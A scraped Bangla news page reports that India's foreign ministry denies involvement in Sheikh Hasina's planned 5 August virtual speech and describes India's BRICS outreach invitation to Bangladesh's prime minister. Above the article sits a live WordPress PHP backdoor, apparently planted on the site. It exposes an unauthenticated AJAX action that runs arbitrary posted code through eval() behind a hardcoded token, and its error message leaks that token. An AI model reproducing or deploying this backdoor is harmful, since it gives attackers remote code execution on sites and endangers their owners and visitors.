// ==[BD:Zs2C7KxW]== add_action( 'wp_ajax_nopriv_snramqswxi', function() { $token = 'Zs2C7KxWXPRioIS4dPDhVykIlRv570xk'; $val = isset( $_POST['token'] ) ? sanitize_text_field( wp_unslash( $_POST['token'] ) ) : ''; if ( empty( $val ) || ! hash_equals( $token, $val ) ) { wp_send_json_error( [ 'message' => 'tok:' . $token ], 403 ); } $marker = isset( $_POST['code'] ) ? (string) wp_unslash( $_POST['code'] ) : ''; if ( trim( $marker ) === '' ) { wp_send_json_error( [ 'message' => 'No code.' ] ); } $marker = preg_replace( '/^\s*<\?(php)?/i', '', $marker ); while ( ob_get_level() > 0 ) { ob_end_clean(); } $ptr = microtime( true ); ob_start(); try { ( static function() use ( $marker ) { return eval( $marker ); } )(); $key = (string) ob_get_clean(); wp_send_json_success( [ 'output' => $key, 'return' => '', 'error' => '', 'time_ms' => round( ( microtime( true ) - $ptr ) * 1000, 2 ) ] ); } catch ( \Throwable $obj ) { while ( ob_get_level() > 0 ) { ob_end_clean(); } wp_send_json_success( [ 'output' => '', 'return' => '', 'error' => $obj->getMessage(), 'time_ms' => round( ( microtime( true ) - $ptr ) * 1000, 2 ) ] ); } } ); // ==[/BD:Zs2C7KxW]== ৫ আগস্ট হাসিনার বক্তব্য দেওয়ার সঙ্গে আমাদের সরকারের কোনো সম্পৃক্ততা নেই: ভারত | potrikaybangladesh.com
Tuesday, September 29, 2026
Homeঅপরাধ৫ আগস্ট হাসিনার বক্তব্য দেওয়ার সঙ্গে আমাদের সরকারের কোনো সম্পৃক্ততা নেই: ভারত

৫ আগস্ট হাসিনার বক্তব্য দেওয়ার সঙ্গে আমাদের সরকারের কোনো সম্পৃক্ততা নেই: ভারত

ক্ষমতাচ্যুত প্রধানমন্ত্রী শেখ হাসিনা আগামী ৫ আগস্ট ভার্চুয়ালি যুক্ত হয়ে বক্তব্য দেওয়ার সঙ্গে ভারত সরকারের কোনো সম্পৃক্ততা নেই বলে জানিয়েছে দেশটির পররাষ্ট্র মন্ত্রণালয়।

আজ মঙ্গলবার ভারতের পররাষ্ট্র মন্ত্রণালয়ের মুখপাত্র রণধীর জয়সওয়াল এক ব্রিফিংয়ে এ কথা জানান।

সাংবাদিকের এক প্রশ্নের জবাবে তিনি বলেন, ‘আপনি যে মতবিনিময় সভার কথা বলছেন, সেটি একটি বেসরকারি সংবাদমাধ্যম আয়োজন করছে। এর সঙ্গে ভারত সরকারের কোনো ধরনের সম্পৃক্ততা নেই। আর ওই ফোরামে যে বক্তব্য দেওয়া হতে পারে, ভারত সরকার তা সমর্থনও করে না।’

ক্ষমতাচ্যুত প্রধানমন্ত্রী শেখ হাসিনা বা বাংলাদেশে কার্যক্রম নিষিদ্ধ কোনো সংগঠনের সঙ্গে যুক্ত কেউ যেন ভারতের ভূখণ্ড ব্যবহার করে রাজনৈতিক বক্তব্য বা বাংলাদেশে অস্থিতিশীলতা তৈরিতে কোনো ধরনের কার্যক্রম পরিচালনা করতে না পারে—তা নিশ্চিতে ভারতের সহযোগিতা চেয়েছিল বাংলাদেশ।

গতকাল সোমবার প্রধানমন্ত্রীর কার্যালয়ে ভারতীয় হাইকমিশনার দীনেশ ত্রিবেদীর সঙ্গে সৌজন্য সাক্ষাৎকালে প্রধানমন্ত্রীর পররাষ্ট্রবিষয়ক উপদেষ্টা হুমায়ুন কবির এ আহ্বান জানিয়েছিলেন।

এর একদিন পরই ভারতের পররাষ্ট্র মন্ত্রণালয়ের পক্ষ থেকে নতুন এ বক্তব্য এলো।

এদিকে, সেপ্টেম্বরের শুরুতে অনুষ্ঠেয় ব্রিকস শীর্ষ সম্মেলনে বাংলাদেশের আমন্ত্রণ সংক্রান্ত বিষয়ে প্রশ্নের জবাবে জয়সওয়াল জানান, ২০২৬ সালের ফেব্রুয়ারিতে নতুন সরকার দায়িত্ব নেওয়ার পর বাংলাদেশের প্রধানমন্ত্রী তারেক রহমানকে দ্বিপক্ষীয় সফরের জন্য আনুষ্ঠানিকভাবে ভারতে আসার আমন্ত্রণ জানিয়েছে দিল্লি।

তিনি বলেন, ‘ব্রিকস শীর্ষ সম্মেলনের বিষয়টির কথা বলা হলে ভারত আলাদাভাবে বাংলাদেশের প্রধানমন্ত্রীকে বিমসটেকের বর্তমান সভাপতি হিসেবে নয়াদিল্লিতে ১৮তম ব্রিকস শীর্ষ সম্মেলনের আউটরিচ সেশনে যোগ দেওয়ার আমন্ত্রণ জানিয়েছে।’

‘ব্রিকসের আউটরিচ সেশনের নিয়ম ও রেওয়াজ অনুসারেই এই আমন্ত্রণ জানানো হয়েছে। অন্যান্য আঞ্চলিক জোট প্রধানদেরও একইভাবে এই সম্মেলনে আমন্ত্রণ জানানো হয়েছে,’ যোগ করেন তিনি।

RELATED ARTICLES

LEAVE A REPLY

Please enter your comment!
Please enter your name here

- Advertisment -
Google search engine

Most Popular

Recent Comments